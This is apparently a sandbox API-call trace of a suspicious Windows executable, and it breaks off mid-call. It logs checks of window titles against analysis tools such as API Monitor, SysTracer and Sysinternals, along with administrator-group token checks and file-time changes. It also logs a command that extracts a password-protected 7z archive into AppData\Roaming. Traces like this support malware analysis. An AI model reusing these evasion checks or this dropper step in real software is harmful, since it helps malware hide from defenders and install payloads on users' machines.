[0158.840] strstr (_Str="Start menu", _SubStr="- main thread") returned 0x0 [0158.840] strstr (_Str="Start menu", _SubStr="API Monitor") returned 0x0 [0158.840] strstr (_Str="Start menu", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.840] strstr (_Str="Start menu", _SubStr="sysinternals") returned 0x0 [0158.840] GetWindowTextA (in: hWnd=0x500b6, lpString=0x340df8, nMaxCount=1024 | out: lpString="Jump List") returned 9 [0158.841] GetClassNameA (in: hWnd=0x500b6, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="DV2ControlHost") returned 14 [0158.841] strstr (_Str="Jump List", _SubStr="- main thread") returned 0x0 [0158.841] strstr (_Str="Jump List", _SubStr="API Monitor") returned 0x0 [0158.841] strstr (_Str="Jump List", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.841] strstr (_Str="Jump List", _SubStr="sysinternals") returned 0x0 [0158.841] GetWindowTextA (in: hWnd=0x100ac, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.842] GetClassNameA (in: hWnd=0x100ac, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.842] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.842] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.842] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.842] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.842] GetWindowTextA (in: hWnd=0x100aa, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.843] GetClassNameA (in: hWnd=0x100aa, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.843] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.843] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.843] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.843] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.843] GetWindowTextA (in: hWnd=0x100a0, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.844] GetClassNameA (in: hWnd=0x100a0, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.844] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.844] GetWindowTextA (in: hWnd=0x1008c, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.844] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.845] GetWindowTextA (in: hWnd=0x10088, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.845] GetClassNameA (in: hWnd=0x10088, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0158.845] GetWindowTextA (in: hWnd=0x10066, lpString=0x340df8, nMaxCount=1024 | out: lpString="TaskEng - Task Scheduler Engine Process") returned 39 [0158.846] GetClassNameA (in: hWnd=0x10066, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0158.846] GetWindowTextA (in: hWnd=0x10060, lpString=0x3401e0, nMaxCount=1024 | out: lpString="MCI command handling window") returned 27 [0158.846] GetClassNameA (in: hWnd=0x10060, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="#43") returned 3 [0158.847] GetWindowTextA (in: hWnd=0x10058, lpString=0x340df8, nMaxCount=1024 | out: lpString="TaskEng - Task Scheduler Engine Process") returned 39 [0158.847] GetClassNameA (in: hWnd=0x10058, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0158.847] GetWindowTextA (in: hWnd=0x10052, lpString=0x3401e0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0158.848] GetClassNameA (in: hWnd=0x10052, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0158.848] GetWindowTextA (in: hWnd=0x1004a, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.848] GetClassNameA (in: hWnd=0x1004a, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0158.849] GetWindowTextA (in: hWnd=0x20046, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.849] GetClassNameA (in: hWnd=0x20046, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0158.849] GetWindowTextA (in: hWnd=0x30040, lpString=0x340df8, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0158.849] GetClassNameA (in: hWnd=0x30040, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0158.850] GetWindowTextA (in: hWnd=0x10044, lpString=0x3401e0, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0158.850] GetClassNameA (in: hWnd=0x10044, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0158.851] GetWindowTextA (in: hWnd=0x1005c, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.851] GetClassNameA (in: hWnd=0x1005c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0158.852] GetWindowTextA (in: hWnd=0x2007a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0158.852] GetClassNameA (in: hWnd=0x2007a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0158.853] GetWindowTextA (in: hWnd=0x1013a, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.853] GetClassNameA (in: hWnd=0x1013a, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.853] GetWindowTextA (in: hWnd=0x10076, lpString=0x3401e0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0158.853] GetClassNameA (in: hWnd=0x10076, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0158.854] GetWindowTextA (in: hWnd=0x10054, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.854] GetClassNameA (in: hWnd=0x10054, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.854] GetWindowTextA (in: hWnd=0x1021c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0158.855] GetClassNameA (in: hWnd=0x1021c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0158.855] GetWindowTextA (in: hWnd=0x201a4, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.855] GetClassNameA (in: hWnd=0x201a4, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.856] GetWindowTextA (in: hWnd=0x1019a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.856] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.856] GetWindowTextA (in: hWnd=0x10196, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.857] GetClassNameA (in: hWnd=0x10196, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.857] GetWindowTextA (in: hWnd=0x10192, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.857] GetClassNameA (in: hWnd=0x10192, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.858] GetWindowTextA (in: hWnd=0x1018e, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.858] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.858] GetWindowTextA (in: hWnd=0x1018a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.858] GetClassNameA (in: hWnd=0x1018a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.859] GetWindowTextA (in: hWnd=0x10186, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.859] GetClassNameA (in: hWnd=0x10186, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.859] GetWindowTextA (in: hWnd=0x10182, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.860] GetClassNameA (in: hWnd=0x10182, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.860] GetWindowTextA (in: hWnd=0x1017e, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.860] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.861] GetWindowTextA (in: hWnd=0x1017a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.861] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.861] GetWindowTextA (in: hWnd=0x10176, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.862] GetClassNameA (in: hWnd=0x10176, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.862] GetWindowTextA (in: hWnd=0x10172, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.862] GetClassNameA (in: hWnd=0x10172, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.863] GetWindowTextA (in: hWnd=0x1016e, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.864] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.864] GetWindowTextA (in: hWnd=0x1016a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.865] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.865] GetWindowTextA (in: hWnd=0x10166, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.865] GetClassNameA (in: hWnd=0x10166, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.866] GetWindowTextA (in: hWnd=0x10162, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.866] GetClassNameA (in: hWnd=0x10162, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.866] GetWindowTextA (in: hWnd=0x1015e, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.866] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.867] GetWindowTextA (in: hWnd=0x1015a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.867] GetClassNameA (in: hWnd=0x1015a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.867] GetWindowTextA (in: hWnd=0x20154, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.868] GetClassNameA (in: hWnd=0x20154, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.868] GetWindowTextA (in: hWnd=0x2012a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.868] GetClassNameA (in: hWnd=0x2012a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.868] GetWindowTextA (in: hWnd=0x10134, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.869] GetClassNameA (in: hWnd=0x10134, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.869] GetWindowTextA (in: hWnd=0x20024, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.869] GetClassNameA (in: hWnd=0x20024, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.870] GetWindowTextA (in: hWnd=0x20018, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.870] GetClassNameA (in: hWnd=0x20018, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.870] GetWindowTextA (in: hWnd=0x10122, lpString=0x3401e0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0158.870] GetClassNameA (in: hWnd=0x10122, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0158.871] GetWindowTextA (in: hWnd=0x10068, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.871] GetClassNameA (in: hWnd=0x10068, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.871] GetWindowTextA (in: hWnd=0x10062, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.871] GetClassNameA (in: hWnd=0x10062, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.872] GetWindowTextA (in: hWnd=0x1005a, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.872] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.872] GetWindowTextA (in: hWnd=0x10048, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.873] GetClassNameA (in: hWnd=0x10048, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.873] GetWindowTextA (in: hWnd=0x10042, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.873] GetClassNameA (in: hWnd=0x10042, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.874] GetWindowTextA (in: hWnd=0x1005e, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.874] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.874] GetComputerNameA (in: lpBuffer=0x340df8, nSize=0x2f17c0 | out: lpBuffer="AUFDDCNTXWT", nSize=0x2f17c0) returned 1 [0158.882] GetProcAddress (hModule=0x756f0000, lpProcName="GetAccountType") returned 0x756f1215 [0158.887] GetVersion () returned 0x1db10106 [0158.887] GetCurrentThread () returned 0xfffffffe [0158.887] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x18fba4 | out: TokenHandle=0x18fba4*=0x0) returned 0 [0158.887] GetCurrentProcess () returned 0xffffffff [0158.887] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fba4 | out: TokenHandle=0x18fba4*=0x190) returned 1 [0158.887] GetModuleHandleA (lpModuleName="ADVAPI32") returned 0x76650000 [0158.887] GetProcAddress (hModule=0x76650000, lpProcName="CheckTokenMembership") returned 0x7665df04 [0158.887] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fb88, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x221, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fb98 | out: pSid=0x18fb98*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.887] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fb9c | out: IsMember=0x18fb9c) returned 1 [0158.887] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fb88, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x222, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fb98 | out: pSid=0x18fb98*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.888] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fb9c | out: IsMember=0x18fb9c) returned 1 [0158.888] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fb88, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x223, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fb98 | out: pSid=0x18fb98*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.888] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fb9c | out: IsMember=0x18fb9c) returned 1 [0158.888] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fb88, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fb98 | out: pSid=0x18fb98*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.888] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fb9c | out: IsMember=0x18fb9c) returned 1 [0158.888] CloseHandle (hObject=0x190) returned 1 [0158.917] SetFileTime (hFile=0x190, lpCreationTime=0x18fd8c, lpLastAccessTime=0x0, lpLastWriteTime=0x18fd8c) returned 1 [0158.917] CloseHandle (hObject=0x190) returned 1 [0158.934] SetFileTime (hFile=0x190, lpCreationTime=0x18fd8c, lpLastAccessTime=0x0, lpLastWriteTime=0x18fd8c) returned 1 [0158.934] CloseHandle (hObject=0x190) returned 1 [0158.935] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3c7 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0158.952] GetProcAddress (hModule=0x75700000, lpProcName="Exec") returned 0x75701000 [0158.952] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0158.952] GetProcAddress (hModule=0x75c90000, lpProcName="IsWow64Process") returned 0x75ca195e [0158.952] GetCurrentProcess () returned 0xffffffff [0158.952] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18f964 | out: Wow64Process=0x18f964) returned 1 [0158.953] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fb44, dwRevision=0x1 | out: pSecurityDescriptor=0x18fb44) returned 1 [0158.953] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fb44, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fb44) returned 1 [0158.953] CreatePipe (in: hReadPipe=0x18fb98, hWritePipe=0x18fb8c, lpPipeAttributes=0x18fb68, nSize=0x0 | out: hReadPipe=0x18fb98*=0x194, hWritePipe=0x18fb8c*=0x198) returned 1 [0158.953] CreatePipe (in: hReadPipe=0x18fb7c, hWritePipe=0x18fb90, lpPipeAttributes=0x18fb68, nSize=0x0 | out: hReadPipe=0x18fb7c*=0x19c, hWritePipe=0x18fb90*=0x1a0) returned 1 [0158.953] GetStartupInfoA (in: lpStartupInfo=0x18fb00 | out: lpStartupInfo=0x18fb00*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0158.953] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="A.exe x B.7z -psL3117nTGnp393SLZxZy -o\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\" -aoa", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x10, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fb00*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1a0, hStdOutput=0x198, hStdError=0x198), lpProcessInformation=0x18fb58 | out: lpCommandLine="A.exe x B.7z -psL3117nTGnp393SLZxZy -o\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\" -aoa", lpProcessInformation=0x18fb58*(hProcess=0x1a8, hThread=0x1a4, dwProcessId=0x454, dwThreadId=0x764)) returned 1 [0159.044] GetTickCount () returned 0x30260 [0159.044] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.044] Sleep (dwMilliseconds=0x64) [0159.148] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x102 [0159.148] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0159.148] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.148] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.148] Sleep (dwMilliseconds=0x64) [0159.287] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x102 [0159.287] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0159.288] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.288] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.288] Sleep (dwMilliseconds=0x64) [0159.428] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x102 [0159.428] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0159.428] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.428] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.429] Sleep (dwMilliseconds=0x64) [0159.568] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x102 [0159.569] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0159.569] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.569] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.569] Sleep (dwMilliseconds=0x64) [0159.678] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x0 [0159.678] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x0) returned 1 [0159.678] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0xb2, lpBytesLeftThisMessage=0x0) returned 1 [0159.678] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0xb2, lpBytesLeftThisMessage=0x0) returned 1 [0159.678] GetTickCount () returned 0x304e0 [0159.678] ReadFile (in: hFile=0x194, lpBuffer=0x75703078, nNumberOfBytesToRead=0x3ff, lpNumberOfBytesRead=0x18fba0, lpOverlapped=0x0 | out: lpBuffer=0x75703078*, lpNumberOfBytesRead=0x18fba0*=0xb2, lpOverlapped=0x0) returned 1 [0159.678] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x0 [0159.678] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x0) returned 1 [0159.679] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.679] wsprintfA (in: param_1=0x18fa80, param_2="%d" | out: param_1="0") returned 1 [0159.679] lstrcpynA (in: lpString1=0x33611c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0159.679] CloseHandle (hObject=0x1a4) returned 1 [0159.679] CloseHandle (hObject=0x1a8) returned 1 [0159.679] CloseHandle (hObject=0x198) returned 1 [0159.679] CloseHandle (hObject=0x194) returned 1 [0159.679] CloseHandle (hObject=0x1a0) returned 1 [0159.679] CloseHandle (hObject=0x19c) returned 1 [0159.680] SHGetFolderPathA (in: hwnd=0x0, csidl=26, 